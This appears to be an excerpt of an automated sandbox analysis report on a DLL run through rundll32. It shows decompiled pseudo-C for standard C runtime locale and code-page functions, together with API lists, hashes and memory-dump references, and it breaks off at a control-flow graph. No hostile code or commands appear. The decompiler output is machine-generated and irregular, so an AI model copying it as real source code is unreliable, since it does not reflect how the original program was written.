                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 9160a24ba11bea7f56121c3526df287b3ef1fc0d64d3d30ab34cfc7694413407
                          • Instruction ID: 3a5aac1f80403b24fa083e3f63f6db80e1e531fb3a1c62784714f822dcba6094
                          • Opcode Fuzzy Hash: 9160a24ba11bea7f56121c3526df287b3ef1fc0d64d3d30ab34cfc7694413407
                          • Instruction Fuzzy Hash: 2BF02B3150052FDBBB5B5AEFC806A47374F9F51F71B0682219C149E180CB30D814C2E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          Function 6E25E6EC, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 188COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E6E25E6EC(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short _a4, short* _a8, char _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				short* _t56;
				short* _t57;
				short* _t58;
				int _t66;
				int _t68;
				short* _t72;
				intOrPtr _t75;
				void* _t77;
				short* _t78;
				intOrPtr _t85;
				short* _t89;
				short* _t92;
				void* _t94;
				short** _t102;
				short* _t103;
				signed short _t104;
				signed int _t107;
				void* _t108;

				_t39 =  *0x6e2c506c; // 0x5cc08226
				_v8 = _t39 ^ _t107;
				_t3 =  &_a12; // 0x6e24e03b
				_t89 =  *_t3;
				_t104 = _a4;
				_v28 = _a8;
				_v24 = E6E24D5FF(_t89, __ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E6E24D5FF(_t89, __ecx, __edx);
				_t8 =  &_v20; // 0x6e24e03b
				_t99 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) = _t8;
				_t92 = _t104 + 0x80;
				_t46 = _v24;
				 *_t46 = _t104;
				_t102 =  &(_t46[2]);
				 *_t102 = _t92;
				if(_t92 != 0 &&  *_t92 != 0) {
					_t85 =  *0x6e272f04; // 0x17
					E6E25E68F(0, " )'nU", _t85 - 1, _t102);
					_t46 = _v24;
					_t108 = _t108 + 0xc;
					_t99 = 0;
				}
				_v20 = _t99;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t99) {
					_t48 =  *_t102;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t99;
					if( *_t48 == _t99) {
						goto L19;
					}
					_t21 =  &_v20; // 0x6e24e03b
					E6E25E00E(_t92, _t99, _t21);
					_pop(_t92);
					goto L20;
				} else {
					_t72 =  *_t102;
					if(_t72 == 0 ||  *_t72 == _t99) {
						_t16 =  &_v20; // 0x6e24e03b
						E6E25E112(_t92, _t99, _t16);
					} else {
						_t15 =  &_v20; // 0x6e24e03b
						E6E25E077(_t92, _t99, _t15);
					}
					_pop(_t92);
					if(_v20 != 0) {
						_t103 = 0;
						__eflags = 0;
						goto L25;
					} else {
						_t75 =  *0x6e272dec; // 0x41
						_t77 = E6E25E68F(_t99, "t!\'nE", _t75 - 1, _v24);
						_t108 = _t108 + 0xc;
						if(_t77 == 0) {
							L20:
							_t103 = 0;
							__eflags = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t104 = E6E25E518(_t92,  ~_t104 & _t104 + 0x00000100,  &_v20);
								_pop(_t94);
								__eflags = _t104;
								if(_t104 == 0) {
									goto L22;
								}
								__eflags = _t104 - 0xfde8;
								if(_t104 == 0xfde8) {
									goto L22;
								}
								__eflags = _t104 - 0xfde9;
								if(_t104 == 0xfde9) {
									goto L22;
								}
								_t56 = IsValidCodePage(_t104 & 0x0000ffff);
								__eflags = _t56;
								if(_t56 == 0) {
									goto L22;
								}
								_t57 = IsValidLocale(_v16, 1);
								__eflags = _t57;
								if(_t57 == 0) {
									goto L22;
								}
								_t58 = _v28;
								__eflags = _t58;
								if(__eflags != 0) {
									 *_t58 = _t104;
								}
								E6E2545D6(_t89, _t94, _t103, __eflags, _v16,  &(_v24[0x128]), 0x55, _t103);
								__eflags = _t89;
								if(__eflags == 0) {
									L36:
									L23:
									return E6E21F8A5(_v8 ^ _t107, _t99, _t104);
								}
								E6E2545D6(_t89, _t94, _t103, __eflags, _v16,  &(_t89[0x90]), 0x55, _t103);
								_t66 = GetLocaleInfoW(_v16, 0x1001, _t89, 0x40);
								__eflags = _t66;
								if(_t66 == 0) {
									goto L22;
								}
								_t68 = GetLocaleInfoW(_v12, 0x1002,  &(_t89[0x40]), 0x40);
								__eflags = _t68;
								if(_t68 == 0) {
									goto L22;
								}
								E6E265124( &(_t89[0x80]), _t104,  &(_t89[0x80]), 0x10, 0xa);
								goto L36;
							}
							L22:
							goto L23;
						}
						_t78 =  *_t102;
						_t103 = 0;
						if(_t78 == 0 ||  *_t78 == 0) {
							E6E25E112(_t92, _t99,  &_v20);
						} else {
							E6E25E077(_t92, _t99,  &_v20);
						}
						_pop(_t92);
						goto L21;
					}
				}
			}



































                          0x6e25e6f4
                          0x6e25e6fb
                          0x6e25e702
                          0x6e25e702
                          0x6e25e706
                          0x6e25e70a
                          0x6e25e718
                          0x6e25e71d
                          0x6e25e71e
                          0x6e25e71f
                          0x6e25e720
                          0x6e25e725
                          0x6e25e728
                          0x6e25e72a
                          0x6e25e730
                          0x6e25e736
                          0x6e25e739
                          0x6e25e73b
                          0x6e25e73e
                          0x6e25e742
                          0x6e25e749
                          0x6e25e756
                          0x6e25e75b
                          0x6e25e75e
                          0x6e25e761
                          0x6e25e761
                          0x6e25e763
                          0x6e25e766
                          0x6e25e76a
                          0x6e25e7da
                          0x6e25e7dc
                          0x6e25e7de
                          0x6e25e7f1
                          0x6e25e7f1
                          0x6e25e7f8
                          0x6e25e7fe
                          0x6e25e801
                          0x00000000
                          0x6e25e801
                          0x6e25e7e0
                          0x6e25e7e3
                          0x00000000
                          0x00000000
                          0x6e25e7e5
                          0x6e25e7e9
                          0x6e25e7ee
                          0x00000000
                          0x6e25e771
                          0x6e25e771
                          0x6e25e775
                          0x6e25e787
                          0x6e25e78b
                          0x6e25e77c
                          0x6e25e77c
                          0x6e25e780
                          0x6e25e780
                          0x6e25e794
                          0x6e25e795
                          0x6e25e81f
                          0x6e25e81f
                          0x00000000
                          0x6e25e79b
                          0x6e25e79b
                          0x6e25e7aa
                          0x6e25e7af
                          0x6e25e7b4
                          0x6e25e804
                          0x6e25e804
                          0x6e25e804
                          0x6e25e806
                          0x6e25e80a
                          0x6e25e821
                          0x6e25e82d
                          0x6e25e837
                          0x6e25e83a
                          0x6e25e83b
                          0x6e25e83d
                          0x00000000
                          0x00000000
                          0x6e25e83f
                          0x6e25e845
                          0x00000000
                          0x00000000
                          0x6e25e847
                          0x6e25e84d
                          0x00000000
                          0x00000000
                          0x6e25e853
                          0x6e25e859
                          0x6e25e85b
                          0x00000000
                          0x00000000
                          0x6e25e862
                          0x6e25e868
                          0x6e25e86a
                          0x00000000
                          0x00000000
                          0x6e25e86c
                          0x6e25e86f
                          0x6e25e871
                          0x6e25e873
                          0x6e25e873
                          0x6e25e884
                          0x6e25e889
                          0x6e25e88b
                          0x6e25e8eb
                          0x6e25e80e
                          0x6e25e81e
                          0x6e25e81e
                          0x6e25e89a
                          0x6e25e8aa
                          0x6e25e8b0
                          0x6e25e8b2
                          0x00000000
                          0x00000000
                          0x6e25e8c9
                          0x6e25e8cf
                          0x6e25e8d1
                          0x00000000
                          0x00000000
                          0x6e25e8e3
                          0x00000000
                          0x6e25e8e8
                          0x6e25e80c
                          0x00000000
                          0x6e25e80c
                          0x6e25e7b6
                          0x6e25e7b8
                          0x6e25e7bc
                          0x6e25e7d2
                          0x6e25e7c3
                          0x6e25e7c7
                          0x6e25e7c7
                          0x6e25e7d7
                          0x00000000
                          0x6e25e7d7
                          0x6e25e795

                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,F9AC1F88), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,F9AC1F88), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D65E
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,F9AC1F88), ref: 6E24D66B
                          • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 6E25E7F8
                          • IsValidCodePage.KERNEL32(00000000), ref: 6E25E853
                          • IsValidLocale.KERNEL32(?,00000001), ref: 6E25E862
                          • GetLocaleInfoW.KERNEL32(?,00001001,;$n,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 6E25E8AA
                          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 6E25E8C9
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                          • String ID: )'nU$;$n$;$n$;$n$t!'nE
                          • API String ID: 745075371-2121107865
                          • Opcode ID: 3792e52e968786ec7cb0c6d5d0a354fc8e1d323a8bf583073755eef9a420c387
                          • Instruction ID: 31848dbe8ed06705351c518260bf3401cceb05052acfd820eda98e982d1971bc
                          • Opcode Fuzzy Hash: 3792e52e968786ec7cb0c6d5d0a354fc8e1d323a8bf583073755eef9a420c387
                          • Instruction Fuzzy Hash: 03516D7290021FABEF50DFE5CD48ABE77BAEF05701F044569E920EB250EB709960CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25DD96, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 236COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E6E25DD96(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4, signed short* _a8, char _a12) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v40;
				signed int _v52;
				char _v252;
				short _v292;
				void* __esi;
				void* __ebp;
				void* _t34;
				short* _t35;
				intOrPtr* _t36;
				void* _t39;
				signed short* _t44;
				intOrPtr _t47;
				void* _t49;
				signed int _t52;
				signed int _t58;
				signed int _t60;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t76;
				void* _t80;
				intOrPtr _t87;
				short* _t89;
				void* _t90;
				void* _t92;
				signed int _t94;
				void* _t95;
				intOrPtr* _t98;
				void* _t112;
				void* _t116;
				intOrPtr* _t118;
				intOrPtr _t121;
				signed int* _t122;
				intOrPtr* _t125;
				signed short _t127;
				int _t129;
				void* _t130;
				signed int _t132;
				void* _t133;
				signed int _t134;

				_t115 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_push(__edi);
				_t34 = E6E24D5FF(__ebx, __ecx, __edx);
				_t87 = _a4;
				_t94 = 0;
				_v12 = 0;
				_t3 = _t34 + 0x50; // 0x50
				_t125 = _t3;
				_t4 = _t125 + 0x250; // 0x2a0
				_t35 = _t4;
				 *((intOrPtr*)(_t125 + 8)) = 0;
				 *_t35 = 0;
				_t6 = _t125 + 4; // 0x54
				_t118 = _t6;
				_v8 = _t35;
				_t36 = _t87 + 0x80;
				 *_t125 = _t87;
				 *_t118 = _t36;
				if( *_t36 != 0) {
					E6E25DD27(" )'nU", 0x16, _t118);
					_t133 = _t133 + 0xc;
					_t94 = 0;
				}
				_push(_t125);
				if( *((intOrPtr*)( *_t125)) == _t94) {
					E6E25D652(_t87, _t94, _t115, _t118, __eflags);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t118)) == _t94) {
						E6E25D775();
					} else {
						E6E25D6DB(_t94);
					}
					_pop(_t95);
					if( *((intOrPtr*)(_t125 + 8)) == 0) {
						_t80 = E6E25DD27("t!\'nE", 0x40, _t125);
						_t133 = _t133 + 0xc;
						if(_t80 != 0) {
							_push(_t125);
							if( *((intOrPtr*)( *_t118)) == 0) {
								E6E25D775();
							} else {
								E6E25D6DB(0);
							}
							L12:
							_pop(_t95);
						}
					}
				}
				if( *((intOrPtr*)(_t125 + 8)) == 0) {
					L31:
					_t39 = 0;
					__eflags = 0;
					goto L32;
				} else {
					_t127 = E6E25DBAF(_t95, _t87 + 0x100, _t125);
					if(_t127 == 0 || _t127 == 0xfde8 || _t127 == 0xfde9 || IsValidCodePage(_t127 & 0x0000ffff) == 0) {
						goto L31;
					} else {
						_t44 = _a8;
						if(_t44 != 0) {
							 *_t44 = _t127;
						}
						_t13 =  &_a12; // 0x6e24e042
						_t121 =  *_t13;
						if(_t121 == 0) {
							L30:
							_t39 = 1;
							goto L32;
						} else {
							_t98 = _v8;
							_t89 = _t121 + 0x120;
							 *_t89 = 0;
							_t116 = _t98 + 2;
							do {
								_t47 =  *_t98;
								_t98 = _t98 + 2;
							} while (_t47 != _v12);
							_t100 = _t98 - _t116 >> 1;
							_push((_t98 - _t116 >> 1) + 1);
							_t49 = E6E25D5B2(_t98 - _t116 >> 1, _t89, 0x55, _v8);
							_t134 = _t133 + 0x10;
							_t153 = _t49;
							if(_t49 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E6E242188();
								asm("int3");
								_t132 = _t134;
								_t52 =  *0x6e2c506c; // 0x5cc08226
								_v52 = _t52 ^ _t132;
								_push(_t89);
								_push(_t127);
								_push(_t121);
								_t90 = E6E24D5FF(_t89, _t100, _t116);
								_t122 =  *(E6E24D5FF(_t90, _t100, _t116) + 0x34c);
								_t129 = E6E25E4C7(_v40);
								asm("sbb ecx, ecx");
								_t58 = GetLocaleInfoW(_t129, ( ~( *(_t90 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								__eflags = _t58;
								if(_t58 != 0) {
									_t60 = E6E25806D(_t90, _t122, _t129,  *((intOrPtr*)(_t90 + 0x54)),  &_v252);
									__eflags = _t60;
									if(_t60 == 0) {
										_t66 = E6E25E5FB(_t129);
										__eflags = _t66;
										if(_t66 != 0) {
											 *_t122 =  *_t122 | 0x00000004;
											__eflags =  *_t122;
											_t122[2] = _t129;
											_t122[1] = _t129;
										}
									}
									__eflags =  !( *_t122 >> 2) & 0x00000001;
								} else {
									 *_t122 =  *_t122 & _t58;
								}
								_pop(_t130);
								__eflags = _v12 ^ _t132;
								return E6E21F8A5(_v12 ^ _t132, _t116, _t130);
							} else {
								_t68 = E6E254323(_t100, _t153, _t89, 0x1001, _t121, 0x40);
								_t154 = _t68;
								if(_t68 == 0) {
									goto L31;
								} else {
									_t92 = _t121 + 0x80;
									if(E6E254323(_t100, _t154, _t121 + 0x120, 0x1002, _t92, 0x40) == 0) {
										goto L31;
									} else {
										_push(0x5f);
										_t71 = E6E267BBB(_t100);
										_t112 = _t92;
										if(_t71 != 0) {
											L28:
											if(E6E254323(_t112, _t157, _t121 + 0x120, 7, _t92, 0x40) == 0) {
												goto L31;
											} else {
												goto L29;
											}
										} else {
											_push(0x2e);
											_t76 = E6E267BBB(_t112);
											_t112 = _t92;
											_t157 = _t76;
											if(_t76 == 0) {
												L29:
												E6E265124(_t112, _t127, _t121 + 0x100, 0x10, 0xa);
												goto L30;
											} else {
												goto L28;
											}
										}
									}
								}
								L32:
								return _t39;
							}
						}
					}
				}
			}













































                          0x6e25dd96
                          0x6e25dd9b
                          0x6e25dd9c
                          0x6e25dd9d
                          0x6e25dd9f
                          0x6e25dda0
                          0x6e25dda5
                          0x6e25dda8
                          0x6e25ddaa
                          0x6e25ddad
                          0x6e25ddad
                          0x6e25ddb0
                          0x6e25ddb0
                          0x6e25ddb6
                          0x6e25ddb9
                          0x6e25ddbc
                          0x6e25ddbc
                          0x6e25ddbf
                          0x6e25ddc2
                          0x6e25ddc8
                          0x6e25ddca
                          0x6e25ddcf
                          0x6e25ddd9
                          0x6e25ddde
                          0x6e25dde1
                          0x6e25dde1
                          0x6e25dde5
                          0x6e25dde9
                          0x6e25de32
                          0x00000000
                          0x6e25ddeb
                          0x6e25ddf0
                          0x6e25ddf9
                          0x6e25ddf2
                          0x6e25ddf2
                          0x6e25ddf2
                          0x6e25de00
                          0x6e25de04
                          0x6e25de0e
                          0x6e25de13
                          0x6e25de18
                          0x6e25de1e
                          0x6e25de22
                          0x6e25de2b
                          0x6e25de24
                          0x6e25de24
                          0x6e25de24
                          0x6e25de37
                          0x6e25de37
                          0x6e25de37
                          0x6e25de18
                          0x6e25de04
                          0x6e25de3d
                          0x6e25df4f
                          0x6e25df4f
                          0x6e25df4f
                          0x00000000
                          0x6e25de43
                          0x6e25de50
                          0x6e25de56
                          0x00000000
                          0x6e25de86
                          0x6e25de86
                          0x6e25de8b
                          0x6e25de8d
                          0x6e25de8d
                          0x6e25de8f
                          0x6e25de8f
                          0x6e25de94
                          0x6e25df4a
                          0x6e25df4c
                          0x00000000
                          0x6e25de9a
                          0x6e25de9a
                          0x6e25de9d
                          0x6e25dea5
                          0x6e25dea8
                          0x6e25deab
                          0x6e25deab
                          0x6e25deae
                          0x6e25deb1
                          0x6e25deb9
                          0x6e25debe
                          0x6e25dec5
                          0x6e25deca
                          0x6e25decd
                          0x6e25decf
                          0x6e25df5a
                          0x6e25df5b
                          0x6e25df5c
                          0x6e25df5d
                          0x6e25df5e
                          0x6e25df5f
                          0x6e25df64
                          0x6e25df68
                          0x6e25df70
                          0x6e25df77
                          0x6e25df7a
                          0x6e25df7b
                          0x6e25df7f
                          0x6e25df85
                          0x6e25df8d
                          0x6e25df9c
                          0x6e25dfa8
                          0x6e25dfb9
                          0x6e25dfbf
                          0x6e25dfc1
                          0x6e25dfd2
                          0x6e25dfd9
                          0x6e25dfdb
                          0x6e25dfde
                          0x6e25dfe4
                          0x6e25dfe6
                          0x6e25dfe8
                          0x6e25dfe8
                          0x6e25dfeb
                          0x6e25dfee
                          0x6e25dfee
                          0x6e25dfe6
                          0x6e25dff8
                          0x6e25dfc3
                          0x6e25dfc3
                          0x6e25dfc5
                          0x6e25dfff
                          0x6e25e000
                          0x6e25e00b
                          0x6e25ded5
                          0x6e25dede
                          0x6e25dee3
                          0x6e25dee5
                          0x00000000
                          0x6e25dee7
                          0x6e25dee9
                          0x6e25df03
                          0x00000000
                          0x6e25df05
                          0x6e25df05
                          0x6e25df08
                          0x6e25df0e
                          0x6e25df11
                          0x6e25df21
                          0x6e25df34
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25df13
                          0x6e25df13
                          0x6e25df16
                          0x6e25df1c
                          0x6e25df1d
                          0x6e25df1f
                          0x6e25df36
                          0x6e25df42
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25df1f
                          0x6e25df11
                          0x6e25df03
                          0x6e25df51
                          0x6e25df57
                          0x6e25df57
                          0x6e25decf
                          0x6e25de94
                          0x6e25de56

                          APIs
                            • Part of subcall function 6E24D5FF: GetLastError.KERNEL32(?,6E2DCE94,6E241803,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,F9AC1F88), ref: 6E24D603
                            • Part of subcall function 6E24D5FF: _free.LIBCMT ref: 6E24D636
                            • Part of subcall function 6E24D5FF: SetLastError.KERNEL32(00000000,6E2C2B60,0000000C,6E20402A,00000000,00000001,?,`k,n,00000020,6E20159B,F9AC1F88), ref: 6E24D677
                            • Part of subcall function 6E24D5FF: _abort.LIBCMT ref: 6E24D67D
                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E24E042,?,?,?,?,6E24DA1E,?,00000004), ref: 6E25DE78
                          • _wcschr.LIBVCRUNTIME ref: 6E25DF08
                          • _wcschr.LIBVCRUNTIME ref: 6E25DF16
                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,B$n,00000000,?), ref: 6E25DFB9
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                          • String ID: )'nU$B$n$t!'nE
                          • API String ID: 4212172061-2691769108
                          • Opcode ID: 3410f5026dad02189e62c584e52bcc8349c0951207dd4bb4e4bd8fed7cacce64
                          • Instruction ID: 2b251e721f309d78bfe7e04eb351676c9dd4c35e7766c24981b4a7f2a843bb41
                          • Opcode Fuzzy Hash: 3410f5026dad02189e62c584e52bcc8349c0951207dd4bb4e4bd8fed7cacce64
                          • Instruction Fuzzy Hash: 9D61077651420FABE7149BB5CD45BAB73AEEF05705F10086AE919DB380EB30E5618B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25E518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 94%
                          			E6E25E518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6e25e837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6e272f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6e272f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6E24BF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6e25e837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                          0x6e25e51d
                          0x6e25e51e
                          0x6e25e525
                          0x6e25e5c9
                          0x6e25e5cf
                          0x6e25e5e2
                          0x6e25e5e8
                          0x6e25e5ed
                          0x6e25e5ef
                          0x6e25e5ef
                          0x6e25e5f5
                          0x6e25e5fa
                          0x6e25e5fa
                          0x6e25e5e4
                          0x6e25e5e4
                          0x00000000
                          0x6e25e5e4
                          0x6e25e52b
                          0x6e25e530
                          0x00000000
                          0x00000000
                          0x6e25e536
                          0x6e25e53b
                          0x6e25e53d
                          0x6e25e53d
                          0x6e25e543
                          0x00000000
                          0x00000000
                          0x6e25e548
                          0x6e25e55f
                          0x6e25e55f
                          0x6e25e568
                          0x6e25e56a
                          0x00000000
                          0x00000000
                          0x6e25e56c
                          0x6e25e571
                          0x6e25e573
                          0x6e25e573
                          0x6e25e579
                          0x00000000
                          0x00000000
                          0x6e25e57e
                          0x6e25e59c
                          0x6e25e59e
                          0x6e25e5c1
                          0x00000000
                          0x6e25e5c6
                          0x6e25e5a6
                          0x6e25e5b9
                          0x00000000
                          0x00000000
                          0x6e25e5bb
                          0x00000000
                          0x6e25e5bb
                          0x6e25e580
                          0x6e25e588
                          0x00000000
                          0x00000000
                          0x6e25e58a
                          0x6e25e58d
                          0x6e25e593
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25e595
                          0x6e25e597
                          0x6e25e599
                          0x00000000
                          0x6e25e599
                          0x6e25e54a
                          0x6e25e552
                          0x00000000
                          0x00000000
                          0x6e25e554
                          0x6e25e557
                          0x6e25e55d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e25e55d
                          0x6e25e563
                          0x6e25e565
                          0x00000000

                          APIs
                          • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6E25E837,?,00000000), ref: 6E25E5B1
                          • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6E25E837,?,00000000), ref: 6E25E5DA
                          • GetACP.KERNEL32(?,?,6E25E837,?,00000000), ref: 6E25E5EF
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.483288618.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000003.00000002.483284816.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483332321.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483367165.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483373942.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000003.00000002.483378050.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6e1e0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InfoLocale
                          • String ID: 7%n$ACP$OCP
                          • API String ID: 2299586839-4090478770
                          • Opcode ID: 646b781da5e3297031d96d5bdb43cd2efe43efc50c8349720b12df6b31ebd355
                          • Instruction ID: 69987023b77f53b8312c72898458cf337b6296a8d7c1e5f85c75278e2aa7208e
                          • Opcode Fuzzy Hash: 646b781da5e3297031d96d5bdb43cd2efe43efc50c8349720b12df6b31ebd355
                          • Instruction Fuzzy Hash: 8821C1B261410EABE7A08FD9CB04A8777B7EB45B21B568465E91AC7308F732DD60C750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E25BF64, Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 588 6e25bf64-6e25bf78 589 6e25bfe6-6e25bfee 588->589 590 6e25bf7a-6e25bf7f 588->590 592 6e25c035-6e25c04d call 6e25c0d7 589->592 593 6e25bff0-6e25bff3 589->593 590->589 591 6e25bf81-6e25bf86 590->591 591->589 594 6e25bf88-6e25bf8b 591->594 603 6e25c050-6e25c057 592->603 593->592 596 6e25bff5-6e25c032 call 6e24cbd3 * 4 593->596 594->589 597 6e25bf8d-6e25bf95 594->597 596->592 601 6e25bf97-6e25bf9a 597->601 602 6e25bfaf-6e25bfb7 597->602 601->602 607 6e25bf9c-6e25bfae call 6e24cbd3 call 6e25c7cf 601->607 605 6e25bfd1-6e25bfe5 call 6e24cbd3 * 2 602->605 606 6e25bfb9-6e25bfbc 602->606 608 6e25c076-6e25c07a 603->608 609 6e25c059-6e25c05d 603->609 605->589 606->605 611 6e25bfbe-6e25bfd0 call 6e24cbd3 call 6e25ccc3 606->611 607->602 612 6e25c092-6e25c09e 608->612 613 6e25c07c-6e25c081 608->613 616 6e25c073 609->616 617 6e25c05f-6e25c062 609->617 611->605 612->603 623 6e25c0a0-6e25c0ad call 6e24cbd3 612->623 620 6e25c083-6e25c086 613->620 621 6e25c08f 613->621 616->608 617->616 625 6e25c064-6e25c072 call 6e24cbd3 * 2 617->625 620->621 628 6e25c088-6e25c08e call 6e24cbd3 620->628 621->612 625->616 628->621
                          C-Code - Quality: 100%
